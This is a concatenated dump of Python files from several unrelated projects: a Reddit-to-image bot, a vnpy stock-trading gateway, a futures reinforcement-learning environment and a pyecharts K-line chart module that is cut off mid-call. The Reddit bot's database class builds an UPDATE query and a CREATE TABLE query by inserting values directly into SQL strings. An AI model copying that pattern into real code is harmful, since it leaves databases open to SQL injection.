draw = ImageDraw.Draw(self.image)
position = (40, self.size - 50)
draw.text(position, source_string,
fill=(255, 255, 255, 255), font=font)
def save(self, file_path):
if self.image is None:
print("No image generated")
return None
self.image.save(file_path, "JPEG")
def show(self):
if self.image is None:
print("No image generated")
return None
self.image.show()
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/reddit_subs_db.py
```python
import mysql.connector
class MysqlSubmissions(object):
def __init__(self):
self.db = None
def connect(self, host, database, user, password):
self.db = mysql.connector.connect(
host=host,
database=database,
user=user,
password=password
)
def create_table(self, table_name):
db_cursor = self.db.cursor()
create_table_query = f" \
CREATE TABLE IF NOT EXISTS {table_name} \
( sub_id VARCHAR(120) UNIQUE NOT NULL,\
sub_creation_time DATETIME NOT NULL,\
is_posted BOOL DEFAULT 0,\
PRIMARY KEY (sub_id)\
);"
db_cursor.execute(create_table_query)
db_cursor.close()
def insert(self, data):
db_cursor = self.db.cursor()
insert_query = "INSERT IGNORE INTO life_pro_tips (sub_id, sub_creation_time) \
VALUES (%s, %s)"
db_cursor.executemany(insert_query, data)
self.db.commit()
db_cursor.close()
def get_new_post(self):
db_cursor = self.db.cursor()
select_query = "SELECT sub_id, sub_creation_time, is_posted FROM life_pro_tips \
INNER JOIN(SELECT is_posted AS isposted, MIN(sub_creation_time) \
AS maxtime FROM life_pro_tips WHERE is_posted = 0) mingroup \
ON life_pro_tips.sub_creation_time = mingroup.maxtime"
db_cursor.execute(select_query)
results = db_cursor.fetchall()
db_cursor.close()
return results
def get_pending_posts(self):
db_cursor = self.db.cursor()
select_query = "SELECT sub_id FROM life_pro_tips WHERE is_posted = 0"
db_cursor.execute(select_query)
results = db_cursor.fetchall()
db_cursor.close()
return results
def set_posted(self, sub_id, is_posted=1):
db_cursor = self.db.cursor()
update_query = f"UPDATE life_pro_tips set is_posted = 1 WHERE sub_id = '{sub_id}'"
db_cursor.execute(update_query)
self.db.commit()
db_cursor.close()
def close(self):
self.db.close()
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/reddit_top_subs.py
```python
import praw
import time
class RedditSubmissions(object):
def __init__(self, min_score=100):
self.reddit = None
self.min_score = min_score
def authenticate(self, client_id, client_secret, password, user_agent, username):
reddit = praw.Reddit(client_id=client_id,
client_secret=client_secret,
password=password,
user_agent=user_agent,
username=username)
self.reddit = reddit
def get_top_subs(self, sub_name):
subs = []
for submission in self.reddit.subreddit(sub_name).hot(limit=10):
if submission.score < self.min_score: continue
formatted_date = time.strftime("%Y-%m-%d %H:%H:%S", time.localtime(submission.created_utc))
subs.append((submission.id, formatted_date))
return subs
def sub_title(self, sub_id):
oldest_sub = praw.models.Submission(self.reddit, id=sub_id)
return oldest_sub.title
```
#### File: reddit-to-imgurImage/reddit_to_imgurImage/textfitter.py
```python
from PIL import Image, ImageDraw, ImageFont
class CenterdTextImage(object):
def __init__(self, size, text_box_size, font_filename,
mode='RGBA', background=(0, 0, 0, 0)):
self.height = size[1]
self.width = size[0]
self.text = None
self.text_box_height = text_box_size[1]
self.text_box_width = text_box_size[0]
self.image = Image.new(mode, (self.width, self.height),
color=background)
self.draw = ImageDraw.Draw(self.image)
self.x = int((self.width - self.text_box_width) / 2)
self.y = int((self.height - self.text_box_height) / 2)
self.font_filename = font_filename
def load_text(self, text):
self.text = text
def write_text(self, pos, text, font_size=11,
color=(255, 255, 255)):
font = ImageFont.truetype(self.font_filename, font_size)
self.draw.text(pos, text, font=font, fill=color)
def get_text_size(self, font_size, text):
font = ImageFont.truetype(self.font_filename, font_size)
return font.getsize(text)
def build_lines(self, font_size):
words = self.text.split()
lines = []
line = []
for word in words:
new_line = ' '.join(line + [word])
size = self.get_text_size(font_size, new_line)
if size[0] <= self.text_box_width:
line.append(word)
else:
lines.append(line)
line = [word]
if line:
lines.append(line)
return lines
def get_max_text_size(self, lines, font_size):
size_array = []
for line in lines:
line = ' '.join(line)
size = self.get_text_size(font_size, line)
size_array.append(size)
return max(size_array, key=lambda x: x[0])
def get_optimal_font_size(self):
lines = []
font_size = 0
height_sum = 0
size = [0, 0]
while height_sum < self.text_box_height:
font_size += 1
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
text_height = size[1]
height_sum = len(lines) * text_height
font_size -= 1
return font_size
def check_max_width(self, font_size):
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
while size[0] > self.text_box_width:
font_size -= 1
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
font_size += 1
return font_size
def write_text_lines(self, color=(255, 255, 255)):
font_size = self.get_optimal_font_size()
font_size = self.check_max_width(font_size)
lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
height_sum = len(lines) * size[1]
height = int((self.height - height_sum) / 2) - \
int(size[1] / 5)
lines = [' '.join(line) for line in lines if line]
for index, line in enumerate(lines):
total_size = self.get_text_size(font_size, line)
x_left = int(self.x + ((self.text_box_width - total_size[0]) / 2))
self.write_text((x_left, height), line,
font_size, color)
height += size[1]
return self.image
``` |
{
"source": "jojoquant/acestock",
"score": 2
} |
#### File: acestock/acestock/td.py
```python
import asyncio
import threading
import datetime
from asyncio import AbstractEventLoop
from copy import copy
from typing import Dict
from easytrader import remoteclient
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.constant import Exchange, Direction, Offset, Status
from vnpy.trader.database import DATETIME_TZ
from vnpy.trader.object import AccountData, PositionData, CancelRequest, OrderRequest, OrderData, TradeData
MARKET2VT: Dict[str, Exchange] = {
"深圳": Exchange.SZSE,
"上海": Exchange.SSE,
}
class TradeDataTD:
def __init__(self, gateway: BaseGateway):
self.gateway = gateway
self.api = None
self.api_setting = {}
self.thread: threading.Thread = None
self.loop: AbstractEventLoop = None
self.non_ths_client_list = ['htzq_client', 'ht_client', "gj_client"]
self.ths_client_list = ['universal_client']
self.datetime_format = "%Y-%m-%d %H:%M:%S"
def start_loop(self, loop):
"""
轮询
使用easytrader查询1s ?? 变化的 当日成交 信息, 用于on_trade, 更新策略中的pos信息
easytrader 还可以查询当日委托, 可以对比出 未成交单
"""
asyncio.set_event_loop(loop)
try:
self.gateway.write_log("交易线程中启动协程 loop ...")
loop.run_forever()
except BaseException as err:
self.gateway.write_log("交易线程中启动协程 loop 出现问题!")
self.gateway.write_log(err)
def connect(self, setting):
self.api_setting = setting
if setting['broker'] in self.non_ths_client_list:
self.api = remoteclient.use(**setting)
elif setting['broker'] in self.ths_client_list:
# 通用同花顺客户端
self.api = remoteclient.use(**setting)
# remoteclient 同花顺远程输入代码存在问题, 不存在下面的方法
# self.api.enable_type_keys_for_editor()
self.gateway.write_log("同花顺远程输入代码存在问题, 注意测试 buy/sell 功能")
else:
# 其他券商专用同花顺客户端
# 其他券商专用同花顺客户端不支持自动登录,需要先手动登录。
# 请手动打开并登录客户端后,运用connect函数连接客户端。
self.gateway.write_log("多线程不支持其他券商专用同花顺客户端")
try:
self.api.prepare(**setting)
self.gateway.write_log("交易服务器连接成功!")
self.query_account()
self.query_position()
except Exception as e:
self.gateway.write_log(f"交易服务器连接失败! {e}")
try:
self.loop = asyncio.new_event_loop() # 在当前线程下创建时间循环,(未启用),在start_loop里面启动它
self.thread = threading.Thread(target=self.start_loop, args=(self.loop,)) # 通过当前线程开启新的线程去启动事件循环
self.gateway.write_log("启动交易线程...")
self.thread.start()
except BaseException as err:
self.gateway.write_log("交易线程启动出现问题!")
self.gateway.write_log(err)
def query_account(self) -> None:
"""查询资金"""
try:
ret = self.api.balance
if self.api_setting['broker'] in self.non_ths_client_list:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=self.api_setting['broker'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用金额']
)
elif self.api_setting['broker'] in self.ths_client_list:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=ret['资金账号'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用资金']
)
else:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=ret['资金账号'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用资金']
)
self.gateway.on_account(account)
self.gateway.write_log("账户资金查询成功")
except BaseException as err:
self.gateway.write_log("账户资金查询失败")
self.gateway.write_log(err)
def query_position(self) -> None:
"""查询持仓"""
try:
ret_list = self.api.position
for ret in ret_list:
trade_market_key = "交易市场"
if trade_market_key in ret:
if ("沪" in ret[trade_market_key]) or ("上海" in ret[trade_market_key]):
ret[trade_market_key] = "上海"
elif ("深" in ret[trade_market_key]) or ("深圳" in ret[trade_market_key]):
ret[trade_market_key] = "深圳"
if self.api_setting['broker'] in self.non_ths_client_list:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["股票余额"]),
frozen=float(ret["冻结数量"]),
price=float(ret["成本价"]),
pnl=float(ret["盈亏"]),
yd_volume=float(ret["可用余额"]),
gateway_name=self.gateway.gateway_name
)
elif self.api_setting['broker'] in self.ths_client_list:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["当前持仓"]),
frozen=float(ret["当前持仓"] - ret["股份可用"]),
price=float(ret["参考成本价"]),
pnl=float(ret["参考盈亏"]),
yd_volume=float(ret["股份可用"]),
gateway_name=self.gateway.gateway_name
)
else:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["当前持仓"]),
frozen=float(ret["当前持仓"] - ret["股份可用"]),
price=float(ret["参考成本价"]),
pnl=float(ret["参考盈亏"]),
yd_volume=float(ret["股份可用"]),
gateway_name=self.gateway.gateway_name
)
self.gateway.on_position(position)
self.gateway.write_log("账户持仓查询成功")
except BaseException as err:
self.gateway.write_log("账户持仓查询失败")
self.gateway.write_log(err)
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
order_id = None
try:
if req.offset == Offset.OPEN:
ret = self.api.buy(security=req.symbol, price=round(req.price, 2), amount=req.volume)
order_id = ret.get('entrust_no', "success")
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
elif req.offset == Offset.CLOSE:
ret = self.api.sell(security=req.symbol, price=round(req.price, 2), amount=req.volume)
order_id = ret.get('entrust_no', "success")
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
if order_id == "success":
self.gateway.write_log("系统配置未设置返回成交回报, 将影响撤单操作")
order_id = "xxxxxx" if order_id is None else order_id
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
except BaseException as e:
order_id = "xxxxxx" if order_id is None else order_id
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.REJECTED
self.gateway.on_order(copy(order))
msg: str = f"开仓委托失败,信息:{e}"
self.gateway.write_log(msg)
finally:
# check today trades
trade = self.get_order_traded_data(order)
if trade is not None:
self.gateway.on_trade(copy(trade))
order.status = Status.ALLTRADED
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
return order.vt_orderid
def get_order_traded_data(self, order: OrderData) -> TradeData:
try:
for trade in self.api.today_trades:
trade_datetime = datetime.datetime.strptime(
f"{datetime.datetime.now(DATETIME_TZ).date()} {trade['成交时间'] if trade['成交时间'] else '00:00:00'}",
self.datetime_format
).replace(tzinfo=DATETIME_TZ)
if order.orderid == trade['合同编号']:
trade = TradeData(
symbol=order.symbol,
exchange=order.exchange,
orderid=order.orderid,
tradeid=trade['成交编号'],
direction=order.direction,
offset=order.offset,
price=float(trade['成交均价']),
volume=float(order.volume), # 理论上 float(trade['成交数量']), 因为会出现2次成交信息,这里用order的量
datetime=trade_datetime,
gateway_name=self.gateway.gateway_name,
)
return trade
return None
except BaseException as e:
self.gateway.write_log(f"获取订单成交数据出错: {e}")
return None
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
# check today order
try:
for order in self.api.today_entrusts:
if order['合同编号'] == req.orderid and order['委托状态'] == "未成交":
r = self.api.cancel_entrust(req.orderid)
if "成功" in r.get('message', ''):
self.gateway.write_log(r['message'])
else:
self.gateway.write_log(f"[{req.orderid}]撤单失败")
else:
self.gateway.write_log(
f"[{req.orderid}]不满足撤单条件无法撤单 或 未在交易委托系统中生成订单无需撤单"
)
except BaseException as e:
self.gateway.write_log(f"取消订单成交数据出错: {e}")
def close(self):
if self.api is not None:
self.api.exit()
self.gateway.write_log("交易服务器断开连接")
```
#### File: acestock/example/async_script2.py
```python
import asyncio
from functools import partial
from tzlocal import get_localzone
import pandas as pd
from jotdx.quotes import Quotes
from datetime import datetime
# client = Quotes.factory(market='std')
# params = {"symbol": "600032", "start": 0, "offset": 50}
# df = partial(client.transaction, **params)()
# print(1)
from vnpy.trader.constant import Exchange
from vnpy.trader.object import TickData, SubscribeRequest
def trans_tick_df_to_tick_data(tick_df, req:SubscribeRequest):
last_price = tick_df['price'][0]
last_volume = tick_df['vol'][0]
# num 放到turnover, 因为在bargenerater里面,
# turnover是累加计算的, open_interest 是不算累加的而取截面的
last_num = tick_df['num'][0]
# buyorsell, 0 buy, 1 sell
# buyorsell = tick_df['buyorsell'][0]
tz = get_localzone()
tick_datetime = datetime.now(tz)
tick = TickData(
gateway_name="paper",
symbol=req.symbol,
exchange=req.exchange,
datetime=tick_datetime,
volume=last_volume,
turnover=last_num,
last_price=last_price,
)
return tick
async def func(req: SubscribeRequest):
client = Quotes.factory(market='std')
loop = asyncio.get_event_loop()
params = {"symbol": req.symbol, "start": 0, "offset": 1}
last_tick_df = await loop.run_in_executor(None, partial(client.transaction, **params))
tz = get_localzone()
tick_datetime = datetime.now(tz)
start_datetime = datetime(
year=tick_datetime.year, month=tick_datetime.month, day=tick_datetime.day,
hour=9, minute=30, second=0, microsecond=0, tzinfo=tz)
end_datetime = datetime(
year=tick_datetime.year, month=tick_datetime.month, day=tick_datetime.day,
hour=15, minute=0, second=0, microsecond=0, tzinfo=tz)
if start_datetime <= tick_datetime <= end_datetime:
pass
while True:
print(f"{req.symbol} func...")
df1 = await loop.run_in_executor(None, partial(client.transaction, **params))
last_tick_df = last_tick_df.append(df1).drop_duplicates()
if len(last_tick_df) != 1:
last_tick_df = df1
tick = trans_tick_df_to_tick_data(last_tick_df, req)
print("推送df1 -> tick: ", tick)
await asyncio.sleep(1.5)
df2 = await loop.run_in_executor(None, partial(client.transaction, **params))
last_tick_df = last_tick_df.append(df2).drop_duplicates()
if len(last_tick_df) != 1:
last_tick_df = df2
tick = trans_tick_df_to_tick_data(last_tick_df, req)
print("推送df2 -> tick: ", tick)
await asyncio.sleep(1.5)
async def async_timer(second=10):
while True:
print(f"time sleep {second}s")
await asyncio.sleep(second)
# symbol_list = ['128050', "110051", "128096", "113039"]
symbol_list = [
SubscribeRequest('128050', Exchange.SZSE),
SubscribeRequest("600032", Exchange.SSE)
]
# symbol_list = []
task_list = [func(s) for s in symbol_list] + [async_timer(10)]
# done, pending = asyncio.run(asyncio.wait(task_list, timeout=10))
done, pending = asyncio.run(asyncio.wait(task_list))
# task_list = [asyncio.create_task(func(s)) for s in symbol_list]
# loop = asyncio.get_event_loop()
# loop.run_forever()
# print(pending)
# print(done)
``` |
{
"source": "jojoquant/jnpy",
"score": 3
} |
#### File: cta_backtester/DRL/environ_future.py
```python
import random
import pandas as pd
import numpy as np
import gym
DEFAULT_BARS_COUNT = 10
DEFAULT_COMMISSION_RATE = 2.5 / 10000
DEFAULT_TIME_COST = 0.1 / 10000
DEFAULT_SECURITY_RATE = 9 / 100 # 保证金比例 螺纹暂时按9%
DEFAULT_CONTRACT_PROD = 10 # 合约乘数
BALANCE = 1.0e6
class FutureEnv(gym.Env):
metadata = {'render.modes': ['human']}
def __init__(
self, prices_df: pd.DataFrame,
bars_count: int = DEFAULT_BARS_COUNT,
commission_rate: float = DEFAULT_COMMISSION_RATE,
time_cost: float = DEFAULT_TIME_COST,
balance: float = BALANCE,
security_rate: float = DEFAULT_SECURITY_RATE,
contract_prod: int = DEFAULT_CONTRACT_PROD
):
assert commission_rate >= 0.0, "佣金比例 should >= 0.0"
assert contract_prod > 0, "合约乘数 should > 0"
assert security_rate > 0.0, "保证金比率 should > 0.0"
assert time_cost >= 0.0, "Time cost should >= 0.0"
assert balance >= 0.0, "Balance should >= 0.0"
assert len(prices_df) > 0, "DataFrame length should > 0"
self.ix = 0 # 每次游戏开始数据的起始的索引
self.step_len = bars_count # 每个step的长度
self.step_n = 1 # 连续obs 相邻 steps 之间的跨度, 为了简化计算, 这里默认为1步, 如果想改周期, 请修改输入的KBar周期
self.commission_rate = commission_rate # 手续费率
self.contract_prod = contract_prod # 合约乘数
self.security_rate = security_rate # 保证金比例
self.time_cost = time_cost
self.start_balance = balance
self.initial_global_var()
self.prices_df_columns_list = list(prices_df.columns)
self.account_position_columns_list = [
'net_position', 'long_position', 'short_position' # , 'trade_num'
]
self.account_value_columns_list = [
'balance', 'hold_share_value', 'hold_money_value' # , 'profit'
]
for col in self.account_position_columns_list + self.account_value_columns_list:
prices_df[col] = self.start_balance if (col == 'balance' or col == 'hold_money_value') else 0.0
self.prices_df = prices_df
self.prices_df_length = len(prices_df)
self.cur_state_df = pd.DataFrame()
self.trade_record_df = pd.DataFrame()
self.action_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(1,), dtype=np.float32)
# shape 为 df columns (包含时间, 去掉日期) + position + reward
self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf,
shape=(self.prices_df.shape[1] * self.step_len,),
dtype=np.float32)
def initial_global_var(self):
self.hold_money_value = self.start_balance
self.hold_share_value = 0.0
self.net_position = 0 # 带正负号
self.long_position = 0 # 不带正负号
self.short_position = 0 # 不带正负号
self.have_long_position = False # 是否持多仓
self.have_short_position = False # 是否持空仓
self.new_df_first_bar_open_price = 0.0 # 开仓价格
self.buy_condition = False
self.sell_condition = False
self.short_condition = False
self.cover_condition = False
def reset(self):
""" 初始化第一个state, 默认上面没有任何操作"""
self.initial_global_var()
self.ix = random.choice(range(len(self.prices_df) - self.step_len))
self.cur_state_df = self.prices_df.iloc[self.ix: self.ix + self.step_len, :].copy()
# 初始化起始状态时, 可能在某个bar上有多空仓位, 此处排除 Sell Cover 平仓动作
# start_position_index = random.choice(range(self.step_len))
# start_position = random.choice([i for i in Actions if (i != Actions.Cover and i != Actions.Sell)])
# start_position_index += self.ix
# self.cur_state_df['position'][start_position_index] = start_position
# if start_position != Actions.Skip:
# pass
# self.total_position = start_position
# self.offset_total_price = self.cur_state_df['open_price'][start_position_index] * self.total_position
return self.cur_state_df
def reset_from_start(self):
""" 初始化第一个state, 用于回测"""
self.initial_global_var()
self.cur_state_df = self.prices_df.iloc[self.ix: self.ix + self.step_len, :].copy().reset_index(drop=True)
return self.cur_state_df
def update_new_df(self, action: float, new_df: pd.DataFrame, commission: float, trade_num: int):
"""
记录 开平仓价格 和 位置,
给出step_reward均摊更新到new step的每个bar上
更新持仓信息
"""
new_df = self.update_new_df_position_info(trade_num, new_df)
# 本次step买进 trade_num手 share 的 真金白银 钱
trade_share_on_first_bar_open_value = trade_num \
* self.contract_prod \
* self.new_df_first_bar_open_price \
* self.security_rate
# 花掉这么多价值的钱+手续费
if self.buy_condition or self.sell_condition:
self.hold_money_value -= (trade_share_on_first_bar_open_value + commission)
elif self.short_condition or self.cover_condition:
self.hold_money_value += (trade_share_on_first_bar_open_value - commission)
# 账户余额
new_df.loc[:, 'hold_money_value'] = self.hold_money_value
# 更新交易记录表
if self.trade_record_df.empty:
self.trade_record_df = new_df.iloc[[0]]
self.trade_record_df = self.trade_record_df.append(new_df.iloc[0])
# 实时净值
if self.buy_condition or self.sell_condition:
# 持仓share的实时价值
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * x['long_position'],
axis=1
)
new_df.loc[:, 'balance'] = new_df.loc[:, 'hold_share_value'] + self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
elif self.short_condition or self.cover_condition:
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * abs(x['short_position']), axis=1)
new_df.loc[:, 'balance'] = 2 * (self.start_balance - commission) - abs(
new_df.loc[:, 'hold_share_value']) - self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
# 在上面条件判断后, 更新多空持仓逻辑
self.have_long_position = True if self.long_position > 0 else False
self.have_short_position = True if self.short_position > 0 else False
return new_df, new_df['balance'].iloc[-1] - self.start_balance
def get_cur_state_trade_num_by_money(self, action: float, current_price: float):
"""通过多空仓位资金使用比例, 计算当前状态下最后一根bar收盘价可交易的数量"""
# (买入比例 * 账户金额) / (当前价格 * 合约乘数 * (保证金比例 + 手续费率)) = 交易手数
return round(
(action[0] * self.hold_money_value) /
(current_price * self.contract_prod * (self.security_rate + self.commission_rate))
)
def get_cur_state_trade_num_by_share(self, action: float, current_price: float):
"""通过持仓可使用比例, 计算当前状态下最后一根bar收盘价可交易的数量"""
# (买入比例 * 账户金额) / (当前价格 * 合约乘数 * 保证金比例) = 交易手数
return round(action[0] * abs(self.net_position))
def get_next_state_commission(self, trade_num):
""" float: = 交易手数 * 合约乘数 * 成交价格(open) * 交易费率 """
return abs(trade_num) * self.contract_prod * self.new_df_first_bar_open_price * self.commission_rate
def step(self, action: float):
# 给出下一个状态
# obs中含有全局reward, Agent设计的时候需要进行记忆
obs = self.cur_state_df.iloc[self.step_n:, :]
obs_last_index = self.cur_state_df.index.to_list()[-1]
reward = 0
done = False
# 更新action条件
self.buy_condition = action > 0.0 and not self.have_short_position
self.sell_condition = action < 0.0 and self.have_long_position
self.short_condition = action < 0.0 and not self.have_long_position
self.cover_condition = action > 0.0 and self.have_short_position
if obs_last_index + 1 + self.step_n > self.prices_df_length:
done = True
info = {}
return obs, reward, done, info
new_df = self.prices_df.iloc[obs_last_index + 1: obs_last_index + 1 + self.step_n].copy()
# 获取当前状态的最后收盘价, 用于计算开仓数量
self.new_df_first_bar_open_price = new_df.loc[:, 'open_price'].iloc[0]
# buy, sell 通过hold_money来计算比例
if self.buy_condition or self.short_condition:
# 有正负, 和action一致
trade_num = self.get_cur_state_trade_num_by_money(action, self.new_df_first_bar_open_price)
else:
trade_num = self.get_cur_state_trade_num_by_share(action, self.new_df_first_bar_open_price)
commission = self.get_next_state_commission(trade_num) # no sign >= 0
# 给出下一个状态的 reward 和 done flag
# TODO 这里环境预设不会双向持仓, 保证训练出来的模型不会有相同行为
# 开仓 Buy
if self.buy_condition:
self.long_position += trade_num
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
# 平仓 sell
elif self.sell_condition:
# 减持多仓数目不能大于持仓量, 大于的部分按照全平处理
trade_num, done = (trade_num, False) if abs(trade_num) < self.long_position else (-self.long_position, True)
self.long_position += trade_num
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
# 开仓 short
elif self.short_condition:
self.short_position += abs(trade_num) # self.short_position不带正负号, trade_num带正负号
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
# 平仓 cover
elif self.cover_condition:
trade_num, done = (trade_num, False) if trade_num < self.short_position else (self.short_position, True)
self.short_position -= trade_num # 注意这里是减持
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
# skip 或者 手有多仓 还收到 buy action
else:
reward -= self.time_cost
trade_num = 0
new_df = self.update_new_df_position_info(trade_num, new_df)
new_df.loc[:, 'hold_money_value'] = self.hold_money_value
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * abs(x['net_position']), axis=1)
if self.have_long_position:
new_df.loc[:, 'balance'] = new_df.loc[:, 'hold_share_value'] + self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
elif self.have_short_position:
new_df.loc[:, 'balance'] = 2 * self.start_balance - abs(
new_df.loc[:, 'hold_share_value']) - self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
obs = obs.append(new_df)
self.cur_state_df = obs
obs_last_index = obs.index.to_list()[-1]
if obs_last_index + 1 + self.step_n >= self.prices_df_length:
done = True
info = {}
return obs, reward, done, info
def update_new_df_position_info(self, trade_num: int, new_df: pd.DataFrame):
# new_df['trade_num'] = trade_num
new_df.loc[:, 'long_position'] = self.long_position
new_df.loc[:, 'short_position'] = self.short_position
self.net_position = self.long_position - self.short_position
new_df.loc[:, 'net_position'] = self.net_position
return new_df
def render(self, mode='human', close=False):
pass
def close(self):
pass
if __name__ == "__main__":
df = pd.read_csv("./data/RBL8.csv")
columns_list = [
'open_price', 'high_price', 'low_price', 'close_price',
'open_interest', 'volume'
]
df = df[columns_list]
env = FutureEnv(prices_df=df)
action = env.action_space.sample()
initial_state_df = env.reset()
# 将起始状态送入model, 给出output action
reward_list = []
done_list = []
obs0, reward, done, info = env.step(action)
reward_list.append(reward)
done_list.append(done)
for _ in range(100):
# action_key = random.choice(list(action_ratio_dict.keys()))
# action = action_ratio_dict[action_key]
action = env.action_space.sample()
print(action)
obs, reward, done, info = env.step(action)
obs0 = obs0.append(obs.iloc[[-1]])
reward_list.append(reward)
done_list.append(done)
print(1)
```
#### File: cta_backtester/ui/KLine_pro_pyecharts.py
```python
import numpy as np
import pandas as pd
from pyecharts import options as opts
from pyecharts.commons.utils import JsCode
from pyecharts.charts import Kline, Line, Bar, Grid
from jnpy.utils.data_manager import ArrayManagerWithDatetime
from jnpy.utils.utils_log import LogModule
from vnpy.trader.utility import get_folder_path
from vnpy.trader.constant import Status, Offset, Direction
def gen_kline(xaxis_data_list, oclh_data_list, order_list):
kline = Kline()
kline.add_xaxis(xaxis_data=xaxis_data_list)
kline.add_yaxis(
series_name="",
y_axis=oclh_data_list,
itemstyle_opts=opts.ItemStyleOpts(
color="#ef232a",
color0="#14b143",
border_color="#ef232a",
border_color0="#14b143",
),
markpoint_opts=opts.MarkPointOpts(
data=[
opts.MarkPointItem(type_="max", name="最大值"),
opts.MarkPointItem(type_="min", name="最小值"),
*order_list
]
),
# markline_opts=opts.MarkLineOpts(
# label_opts=opts.LabelOpts(
# position="middle", color="blue", font_size=15
# ),
# data=split_data_part(),
# symbol=["circle", "none"],
# ),
)
# 这部分是画箱体的, 上面是画箱体对角线连线的
# kline.set_series_opts(
# markarea_opts=opts.MarkAreaOpts(is_silent=True, data=split_data_part())
# )
kline.set_global_opts(
title_opts=opts.TitleOpts(title="K线周期图表", pos_left="0"),
xaxis_opts=opts.AxisOpts(
type_="category",
is_scale=True,
boundary_gap=False,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
split_number=20,
min_="dataMin",
max_="dataMax",
axislabel_opts=opts.LabelOpts(is_show=True, rotate=-30), # 旋转x轴标签一定角度
),
yaxis_opts=opts.AxisOpts(
is_scale=True, splitline_opts=opts.SplitLineOpts(is_show=True)
),
tooltip_opts=opts.TooltipOpts(trigger="axis", axis_pointer_type="line"),
datazoom_opts=[
opts.DataZoomOpts(
is_show=False, type_="inside", xaxis_index=[0, 0], range_end=100
),
opts.DataZoomOpts(
is_show=True, xaxis_index=[0, 1], pos_top="97%", range_end=100
),
opts.DataZoomOpts(is_show=False, xaxis_index=[0, 2], range_end=100),
# opts.DataZoomOpts(is_show=False, xaxis_index=[0, 3], range_end=100), # 连动第三个资金曲线轴
],
# 三个图的 axis 连在一块
# axispointer_opts=opts.AxisPointerOpts(
# is_show=True,
# link=[{"xAxisIndex": "all"}],
# label=opts.LabelOpts(background_color="#777"),
# ),
)
return kline
def gen_tech_line(xaxis_data_list):
tech_line = Line()
tech_line.add_xaxis(xaxis_data=xaxis_data_list)
tech_line.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=1,
axislabel_opts=opts.LabelOpts(is_show=False),
),
yaxis_opts=opts.AxisOpts(
grid_index=1,
split_number=3,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
axistick_opts=opts.AxisTickOpts(is_show=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
axislabel_opts=opts.LabelOpts(is_show=True),
),
)
return tech_line
def gen_volume_bar(xaxis_data_list, volume_list):
# Bar-1
volume_bar = Bar()
volume_bar.add_xaxis(xaxis_data=xaxis_data_list)
volume_bar.add_yaxis(
series_name="Volumn",
yaxis_data=volume_list,
xaxis_index=1,
yaxis_index=1,
label_opts=opts.LabelOpts(is_show=False),
# 根据 echarts demo 的原版是这么写的
# itemstyle_opts=opts.ItemStyleOpts(
# color=JsCode("""
# function(params) {
# var colorList;
# if (data.datas[params.dataIndex][1]>data.datas[params.dataIndex][0]) {
# colorList = '#ef232a';
# } else {
# colorList = '#14b143';
# }
# return colorList;
# }
# """)
# )
# 改进后在 grid 中 add_js_funcs 后变成如下
itemstyle_opts=opts.ItemStyleOpts(
color=JsCode(
"""
function(params) {
var colorList;
if (barData[params.dataIndex][1] > barData[params.dataIndex][0]) {
colorList = '#ef232a';
} else {
colorList = '#14b143';
}
return colorList;
}
"""
)
),
)
volume_bar.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=1,
axislabel_opts=opts.LabelOpts(is_show=False),
),
legend_opts=opts.LegendOpts(is_show=False),
)
return volume_bar
def gen_macd_bar_line(xaxis_data_list, macd_list, dif_list, deas_list):
# Bar-2 (Overlap Bar + Line)
bar_2 = (
Bar()
.add_xaxis(xaxis_data=xaxis_data_list)
.add_yaxis(
